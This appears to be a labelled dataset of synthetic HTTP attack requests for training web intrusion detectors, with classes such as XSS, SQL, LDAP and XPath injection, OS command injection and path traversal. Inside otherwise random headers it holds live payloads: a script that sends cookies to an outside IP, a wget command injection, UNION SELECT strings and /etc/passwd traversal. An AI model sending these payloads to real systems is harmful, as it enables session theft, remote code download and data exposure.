Host: www.rsgsdeUUi1.ch
Connection: close
Accept: audio/*;q=0.0, application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 208.68.234.50
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sun, 17 Jun 07 10:58:04 CET
ETag: "Wnu8c7V6mR2JtbrB"
Expect: eeyqig
From: 11ria@soa2e.be
If-Modified-Since: Thu, 17 Jan 08 15:59:18 UTC
If-Unmodified-Since: Tue, 21 Jun 05 06:55:29 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 0449
MIME-Version: 8.7
Pragma: he='a'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: /L0dytsrn/stmrra.tiff
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 5aD-ruk. http://www.hg4a.de
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 508x349
Via: 6.0 www.tOHslei.gif
Transfer-Encoding: deflate
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 874 173.192.166.189 "RHrt5n" "Sun, 30 Mar 08 15:54:31 UTC"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 0647223664061782
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48943
Start - Id: 46858
class: XSS
POST /@P24includeLB/sroshe/s66bgMG50w.s/Leb8euitpr/odS8XbxPuRcZTk2w/tewaatyMgt0nrtq/ekKGi1gg8SBcXOCqs66/al/e6fHZKkOfY/tgoasrcnevenebtp.tiff? HTTP/1.1
Content-Length: 210
Content-Language: n,mRenaanu
Content-Encoding: deflate
Content-Location: http://www.es5L.it/f1reGsPw.mpg
Content-MD5: b2ZPdERuZU90ZUFyZm40cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 08:10:49 GMT
Last-Modified: Thu, 14 Apr 05 17:03:15 CET
Host: 238.192.236.254
Connection: close
Accept: */*
Accept-Charset: iso-8859-5;q=0.9, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=6
Client-ip: 213.98.235.52
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Sun, 08 Apr 07 06:15:41 GMT
ETag: "OL7vpoquI9UEl9b.tqk"
Expect: mnxeruiu=mhesipte
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Thu, 25 Mar 10 22:18:32 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Aug 09 04:58:36 CET
Max-Forwards: 2853
MIME-Version: 8.9
Pragma: khw=tsIeg
Proxy-Authorization: Basic Z2lleDplZHNvZHc=
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://www.anrbe.st/iasrtui/nsabcaO/cuhDei/qbM6ibau.exe
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/7.2 (compatible; n8chr3; Solaris; didop0ith)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 758x384
Via: FTP/9.3 www.pytiscf.jpg
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etxnnitLdyaios=1n?pswp-evalatnoqs&eunion9Y=tKoNtW0jh&Ayd1huibti=<<script   >[window.open('http://93.97.54.29/ro.msf'+document.cookie);]</script    >&snrhd7=gt7tSwinntio ]

End - Id: 46858
Start - Id: 47883
class: XSS
GET /ir1meau6rpcoG/2fkzWv50mDmJXMCKO/xeTmpnn/cht4eaier4usrkCAw/7iuaac/a3@gmXX-_5D_/nroneeGj3qr5jawy/hT58UsjB_e1Id0/y-stvTpeDgBmWZCERyT/qH7oj8.9dTt/sr3bodA/eDSXBhwKmVTSD.mspx?Rn6Iw31=th2ellqEgencntmee1&dpfa=nvna%2Fcogiwinnt&s8h=egdpCb2zync&hth=eDQ5debv&i7ttrho3agd=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Balert+++%28%27e9rai%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E HTTP/1.0
Host: www.fiyiid.be
Connection: prnahl
Accept: application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: suu-idRIF, N-prndL;q=0.3, o-reatsBu, hbtesr-dne22, justdse-l;q=0.0
Cache-Control: no-store
Client-ip: 85.234.191.196
Cookie: 9stVrY=93892
Cookie2: $Version="411"
Date: Thu, 23 Sep 04 14:30:53 UTC
ETag: "akDYjrMMwhr7w8IY8-9I"
Expect: 100-continue
From: briu78@sotkdsg.de
If-Modified-Since: Mon, 14 Dec 09 07:37:21 CET
If-Unmodified-Since: Fri, 09 Mar 07 24:38:40 CET
If-Match: "1Mqhh3gYZC5sv7k"
If-None-Match: "Hig5rFfFToO1i@ETXp"
If-Range: Fri, 20 Jan 06 03:29:16 CET
Max-Forwards: 27
MIME-Version: 2.7
Pragma: eeilXqap='Hc8keosg'
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=sa5s7ath
Range: 064-,-6198,422476-
Referer: /annqte.php4
TE: chunked
Trailer: Accept
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 0.4; rO-nz; rv:5.8.5) Gecko/72858244
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: 5.2 238.141.45.126, 2.3 182.78.149.95, 2.4 216.7.36.205:57
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47883
Start - Id: 43393
class: OsCommanding
GET /hs8GdnEsd2n/anv7mawtyhi9Yia/y7@g2iQV-zND@7dYbA/ttr1BTmzPCWhqPhOjoJ.htm?HAmtasesls=%22++%3B++%2Fusr%2Fbin%2Fwget+++www.tamallorti.com%2Fsito++%3B&n3=anamsds1tEfogntwm&cINtiitd01rreL=n%27 HTTP/1.0
Host: 45.232.124.44:80
Connection: keep-alive
Accept: image/png;q=0.1, text/html;q=0.3, video/mpeg
Accept-Charset: euc-jp, utf-8, x-mac-turkish;q=0.7, euc-tw;q=0.4, iso-2022-jp
Accept-Encoding: deflate;q=0.6, identity
Accept-Language: sg7o-jaaltbil
Cache-Control: no-transform
Client-ip: 143.76.65.70
Cookie: Blt=san:eeeif:oeoo;eentzaepc2=etifh
Cookie2: $Version="82"
Date: Wed, 03 Nov 04 13:17:03 CET
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Sat, 13 May 06 08:25:49 GMT
If-Unmodified-Since: Sun, 08 Feb 04 13:28:49 UTC
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: "UQ@8pLk9FBJw1xD"
Max-Forwards: 482
MIME-Version: 6.9
Pragma: l=oeaa
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: Digest realm
Range: -4315,8885-439,063-
Referer: http://olAleXa.org/tib1Gea/hraT7r.gz
TE: trailers
Trailer: If-Modified-Since
User-Agent: do4eJr5f http://www.hesaedi.org
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: gzip
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43393
Start - Id: 47267
class: XSS
GET /celagapr/geg@2kg/qGhx0w/t-75yZLCZh7/zw/iwx.htm?autescnnrEe=atppsti&85nRDO3=99544709&uxwLx5agtce=086579&m4=6SYgax%3Banc&wArLohca=%3Cmeta+++http-equiv++++%3D%22+++++refresh++%22++content++++%3D++%220%3Burl%3Djavascript%3A%5Balert++%28%27lr%27%29%3B%5D++%22+++%3E HTTP/1.1
Host: www.hhhin.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sahlwTht-ao, s-nc
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="86"
Date: Sun, 08 Jan 06 06:35:58 CET
ETag: "FeA4_YpkM_26wHMk"
Expect: ntthjebs
From: mP8eatM@krgt.fr
If-Modified-Since: Mon, 23 Mar 09 13:18:17 UTC
If-Unmodified-Since: Tue, 23 Nov 04 08:04:20 GMT
If-Match: *
If-None-Match: "l3Hl775Y3-0BG2s"
If-Range: "cK.IXQxI2yMdAH-"
Max-Forwards: 75
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic c0lkZHRkNTpucmZH
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: /s2isei/seku/4Nrn/irbr.doc
TE: gzip,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/5.3 (compatible; MSIE 8.1; Win98; 8j3froifa; etoecew; iotteifce)
UA-CPU: Sparc
UA-Disp: 5931,8389,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 753x7661
Via: 4.5 241.48.49.251, dryox/2.8 www.adbt.shtml:3, hrw/9.8 81.77.9.175
Transfer-Encoding: compress
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47267
Start - Id: 37688
class: LdapInjection
POST /uN65RVN750O/a8ss8peoiaeW/fmtqeeuhE/6UqwABSi/iiezgnyerbu2cs2lE/8ScmdaDAfGB0WPnull/qydf/iXkMca@rRcNDwQJhn1C/aokdsestTdbOi0ua.html? HTTP/1.0
Content-Length: 214
Content-Language: slnjtaa,qoeo6,e
Content-Encoding: compress
Content-Location: http://www.2heheit.de/et5d/iuls2/iewaqcw/aHnTl.php
Content-MD5: ZGVoaXpEaGZzbWRpZW9lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Sat, 09 Oct 04 22:00:04 GMT
Host: www.sT1khdso.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312;q=0.1, iso-8859-9;q=0.0, gb2312, us-ascii;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: s6ln934-e;q=0.8, G-ebaWpio;q=0.6, Sw-cStxeSqv;q=0.5
Cache-Control: max-age=55
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="01"
Date: Tue, 14 Mar 06 05:22:37 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sun, 24 Oct 04 08:48:17 GMT
If-Unmodified-Since: Mon, 12 Nov 07 14:32:40 CET
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: Mon, 08 Jan 07 05:23:20 GMT
Max-Forwards: 439
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: Digest qop=auth
Range: 6058-6,88-,-245437
Referer: http://www.7ebe.org/HbmseE8r/pzstnlnT/ohee/zaltsm/qpclsgo.mp3
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: c5othtao
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 940x1719
Via: 5.4 14.221.56.180:8854, HTTP/9.6 www.4meeby9v.htm:25
Transfer-Encoding: compress
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mdl=86&awlhuTpanmftrpz=ra03&lspfihN=HtlnwHCoeen&wrsSnn1mnozYRk=y&vd1ymeaini=AgreeeE/&t9hi8ieDbshO=nkzggT&driapt0an=6609)(&(objectClass=hhrE)(|(sn   =   et)(cn=to     J*))&bfirsches=6

End - Id: 37688
Start - Id: 38213
class: LdapInjection
GET /wtffatzbxefcatc/kbUKLddLYd.mdb?nv6l=tobuE&p6mnhaenl=locationcand8vUnis%3As&x5h@Rtmp25pobjecty=027437&HTwindow.openbsf6beu=229%29%28%26%28objectClass%3Deloo%29%28%7C%28sn++++%3D+dhaf%29%28cn%3DSp+++J*%29%29&The=n5e&7Mstyle04CHxF=oe&pR=p&neRepyLx=TrP HTTP/1.1
Host: www.30mnuy.uk
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=10618
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="98"
Date: Tue, 10 May 05 24:11:28 GMT
ETag: W/"UStOSs522pUjsYdXz8Jw"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 22 Sep 07 17:46:23 CET
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: *
If-None-Match: *
If-Range: "bKLAYnm8eT2pRoV"
Max-Forwards: 8662
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: 5eRiuu etshnsqi=eO4i
Authorization: NTLM ZWN5dHdvRGVyZ3djM3NvdGxpaW95aXNzZXJ0bmFvSGR5c21lZWNpZnNyZG9uZm5h
Range: 1527-875,9678-
Referer: http://www.8eontrol.uk/tomseg/tc2c2eEl/yovr/rTrs3o.tar
TE: gzip;q=0.6,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/3.9 (X11; U; Unix 8.1; is-ya; rv:5.7.9) Gecko/12498746
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 321x2267
Via: 3.7 www.stxuE.jpg:511, 9.3 www.dnileN.tiff
Transfer-Encoding: identity
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38213
Start - Id: 49811
class: XPathInjection
GET /sesnxi/p6kRpD_5fuwY/GvVIznLhchildWP7U/.HJh1xNEA/am-0@lWn.cf/e..ktuPDhmOr4wGdmW/kEtedolajae/a.Et1fa@xWx.png?tzj28tonj=vu81ba_nJAMf&tsek=ui9ascs7niTas&ilr0Qcoano2=1&wsnoiec=ledr34%27+++++or++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i++++%2B++j++%2B++++k++++%2Bl++++%2B+++1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27oeisz%27%3D+%27++grtxsdan%27+++or&ajtbtttyd=fwget2&nc6isIirdyy=23492&rtetoqscseLelr=635349&.tE8u_je=22688&ouslsactnyiedf=rihmo&duhataht=sexh HTTP/1.0
Host: www.2rtls.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: bnzGelen-op;q=0.6, 6-0Vresr;q=0.7, nehatJ2n-oey, vcDi-ruaoiio;q=0.8
Cache-Control: max-stale=27233
Client-ip: 248.234.57.173
Cookie: ubgsoundNt_0qhZ=151;lreecneahtE=n7ld<;u1eag3h=133888;-CDk3=10;hefru=s9crdhEs-tlsunion
Cookie2: $Version="7"
Date: Tue, 08 May 07 02:13:20 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Wed, 14 Mar 07 21:11:01 UTC
If-Match: *
If-None-Match: *
If-Range: "dDg9YTbEPwlmqsZ."
Max-Forwards: 548
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: hbE9e eiza=ioIeete
Range: -786962,-08955,08-
Referer: /nm5g/EDxNtfNm.rar
TE: gzip;q=0.4,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/5.7 (X11; U; Unix 7.2; ds-da; rv:7.7.0) Gecko/12350304
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: aeD/0.0 www.clysye.htm
Transfer-Encoding: compress
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 153.152.40.255
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49811
Start - Id: 46065
class: PathTransversal
GET /w.RyFY/mjZjbfb996/oqrn/kudgC9c4U@/n.qP/cS/trn4gmqet6iyi/techo/bupdateTn@bNBLZh_v/lufolbHkrDeoiMna4ot/z9S6g-gp26bZV/lZ1LH3J.png?vad=connect%2FpUlbee31ebD&nnNtn4sntdoe=sud&1eeeaiteu=sna3fuoknCp&r1re0iaeaiRoa=abi&real=q%3B&7eao=tRUq+oxsnie&nd7=8%24psrJa&7hgyiantseTeIE=soo&duP_FI-u5=f7mLs0Jpa HTTP/1.1
Host: 58.95.89.180:80
Connection: close
Accept: application/*;q=0.3, audio/*
Accept-Charset: shift_jis;q=0.3, iso-8859-2;q=0.7, iso-8859-1, windows-1257;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie: ldh8ndqnoUHc5=anpexegnenahtpo;qde2uetncx=c;mRreszeqigvEn=rqr;croeuh=917;ihjesnb=C;0VG-iall=/etc/passwd
Date: Mon, 04 Aug 08 22:45:20 UTC
ETag: W/"Es@usyq74q0kCsO1N"
Expect: pnraass=hado;W4darhe
From: tbDie@oilckAa.be
If-Modified-Since: Sun, 05 Nov 06 18:26:06 UTC
If-Unmodified-Since: Fri, 16 May 08 07:18:18 GMT
If-None-Match: *
If-Range: Sat, 17 May 08 22:28:51 UTC
Max-Forwards: 255
Proxy-Authorization: Digest nc=0cf0aB9E
Authorization: Basic YWVhbnc5OnMyZWE=
Referer: /Jehgsf/theN.txt
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 2.4; re-ac; rv:6.3.7) Gecko/58306228
Via: 9.8 www.eTprdl.tiff, etDug/1.1 www.teirirnq.jpeg, HTTP/9.5 108.20.140.193
Upgrade: eeain/8.1, c9in/3.7, aaic/9.8
X-Forwarded-For: 144.117.32.171
X-Serial-Number: 30988
----: ----------------

null

End - Id: 46065
Start - Id: 48056
class: XSS
GET /sQMrUzf/hitl4fuooofhcnLtLee1/isSA7/qtttHcem/zdIeteWiyHa/usreD/bmarenegarnlO6ohtf.js?56Ss=s5+%3Ae&nHaeec=twu%40P&usncorddte3=%3Cdiv+++style++%3D++++%22+++++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.atonal.com%2Fscript%2Forar.msf%5D%29%3B++++%22%3E&onirei8sa=ae&8hseczvtme9H=0476506&Byjsystemsndrop=twBNxMzZ.PP&pqMQ.DPQbN=eI+aEr&i1mltno4ssl=8%7Ce HTTP/1.0
Host: 89.149.184.73:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, identity;q=0.8
Accept-Language: Fdk-Itiols0;q=0.6
Cache-Control: min-fresh=60969
Client-ip: 199.91.154.140
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Date: Mon, 07 Mar 05 07:15:13 GMT
If-None-Match: "nxswnkQNfG669Sdi1"
Proxy-Authorization: Yean xazroh=heTobre
Authorization: NTLM MWFoMzQzc21kYWx5ZG82dGFIc09mbmV0ZUhnZWRjZHRneWVldXVuMw==
Referer: http://nloasdar.net/y6sgbTe2/donnujda/agea7ssn.tiff
User-Agent: osqiaoeRvi (mkSANF8TCT; zBYofb; alEj1E)
UA-Pixels: 8331x5573
Upgrade: irzp/3.6, ptlXi/5.1, iuvasd/0.6, qaSdJs/9.5, eajlTI/5.1

null

End - Id: 48056
Start - Id: 35223
class: SqlInjection
GET /sdHml3EE/nrainibbqceT/iRbka-6_9fU/npPT8zaHRb/jOCUAy0u/aaetbtiePa7o/hG0XT2IUJR/ptosauddhfhtimteU/iccewn/k3S-RnullQc/aiaE/rehitbtttd.php?std9afpliy=X%3A&2yexahecRRr=%27++++%29++++UN%2F**%2FION+ALL+++++SEL%2F**%2FECT+++%27ueusp9%27%2C59%2C7%2C%275ctlonctgc%27%2C9++FROM++1sYaceo++WHERE+%28+%27%27+%3D++++%27&safletUi7=902178405&hbodyFULZNY=2o HTTP/1.1
Host: 250.109.26.203
Connection: 3llelrf
Accept: */*
Accept-Charset: windows-1251, euc-tw
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: min-fresh=7870
Client-ip: 1.129.63.171
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Fri, 23 Sep 05 24:58:27 CET
ETag: "NfOfdyVU6e@4HME"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Tue, 20 Apr 04 24:19:06 UTC
If-Match: "fUNZCS-g1_U7oU7"
If-None-Match: "_uXR.-4dYrX7BMO3"
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: syy=nqg
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: http://etiaiue.st/dtaa/IlmM/oonsHA4/tkqSau/sI8lyr.tar
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: t_Ob9GVhX7 http://www.ttcoa.de
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: e198t4/2.1 www.nrscim6.shtml, 8.9 www.ftee.gif, eoo/4.5 204.197.210.110
Transfer-Encoding: gzip
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35223
Start - Id: 36216
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.otbx.cz
Connection: keep-alive
Accept: video/*, audio/x-wav;q=0.1, video/mpeg;q=0.6
Accept-Charset: x-mac-japanese;q=0.5, euc-cn;q=0.2, ks_c_5601-1987;q=0.0
Accept-Encoding: gzip, identity;q=0.5, identity, deflate;q=0.4, compress
Accept-Language: srsg-tliecQl9;q=0.4, p-pn7tiep
Cache-Control: only-if-cached
Client-ip: 253.92.235.246
Cookie: coeiuaSo=cirjmjD9gzfw;f6=HhtaccesmT%]lib~l(tbE;Lh9P0aZJi=219391923;nasNdhnrsa=3:roI
Cookie2: $Version="46"
Date: Sun, 04 Mar 07 13:20:40 GMT
ETag: W/"61@XYEowE14r6d8"
Expect: edstw
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Unmodified-Since: Sun, 11 Feb 07 19:49:27 GMT
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: U1qnuga='re'
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM bnBhSG9heGkzaGxvZUVvN293Y3o2ZW1ocEVyaHRheW90dG4xdGVlaXBMNHQ=
Range: 183-
Referer: http://www.4eokreO.uk/er8s/eideoc.gif
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.0 (compatible; Konqueror/4.7; Windows NT; 8HR7r6rygl; wayc)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 5.8 110.84.189.241, HTTP/9.2 1.12.74.59
Transfer-Encoding: deflate
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36216
Start - Id: 48349
class: XPathInjection
GET /QU/s3haErageAiderte2/0IetSju0FSw/eGgt-ZtsXmGjwlO/r6y8olB2epassthrulxt.html?bn=9018&a2eceB=693&uuts=nlsosarnw&e7n=rfrmacefnnags4T%3B&edosAyrxtaeene5=%3F+&RuwinntzSa6@DGA=iXr9U9&eyjmuio=ieLr&nistpieotyzmri=dWi3X6Z0&a0t7fi=%3Fsrw%3BreW3s+3ds+a HTTP/1.1
Host: 241.93.207.191
Connection: oalnpilt
Accept: image/*
Accept-Charset: utf-8;q=0.6, us-ascii;q=0.0, windows-1253, x-mac-chinesetrad, windows-1253
Accept-Encoding: 603     or  count(path/child::node()[position()=((i+j+k+l+1)]     |   path/child::*()[position()=(k+1)])=1   or   432=
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 201.243.131.154
Cookie: nIanto=afNoYxon;ooRLihn=1kuI;9snrnwlsapdm=939;2yzo=664121;mperSdornoL=ito
Cookie2: $Version="2"
Date: Mon, 18 Apr 05 04:43:29 CET
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Tue, 20 Mar 07 05:40:28 CET
If-Match: "tjEpXq-MJp6.c6Dwh"
If-None-Match: "CAoOMdEfYNdl8pGaUyZU"
If-Range: "hPt.QYl8w3FPf.fjjx"
Max-Forwards: 0728
MIME-Version: 4.9
Pragma: nsoncTx='xtydnEx'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: NTLM c3Joczl2bmVlYW9lZTlrZGNiaHNobGhnOWFiNG9wZWE=
Range: -579124,02412-
Referer: /eL7yHfeu/pktdgn/soaEree/ddss8iot.jsp
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: eoetFlaCtsshDrrl
UA-Color: color8
UA-Pixels: 784x5970
Via: smc/3.5 www.O0alt.htm, Sbs/6.0 www.ashs2.html
Transfer-Encoding: gzip
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48349
Start - Id: 35391
class: SqlInjection
GET /5mMWS@.fJ/Aojld3ueeHgiipZ.gif?tuwstaPsidrhn=sff13sd&nlrnnysm=%27select+++customer_phone++++%27%7C%7C%27from+++customers++++%27%7C%7C%27where++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++and+++customer_type%3D1%27%3B&4ssataefyt=jeoaht5f+%28hts6selectaj%24&ndeliskfda=ixzp3xCAxp&Hening4bo=8gezfiwuEtHiuNhev&nhdhs9l2ozt3I=reeastnrosOzi8i&w3r000oanwe7prg=48348606&o2ej5pi3ra=%2Bde&wdtbeeEltuloygv=qrsl3xes0Eohauedoa HTTP/1.1
Host: www.tSrSrdeb.com
Connection: rektdhk
Accept: text/*;q=0.0, text/*;q=0.7
Accept-Charset: us-ascii;q=0.4
Accept-Encoding: 
Accept-Language: e-eduuiee, N-r, rdzt-dUthoteo;q=0.5, cmt1ahDt-c;q=0.4, ya1-3hQasiri
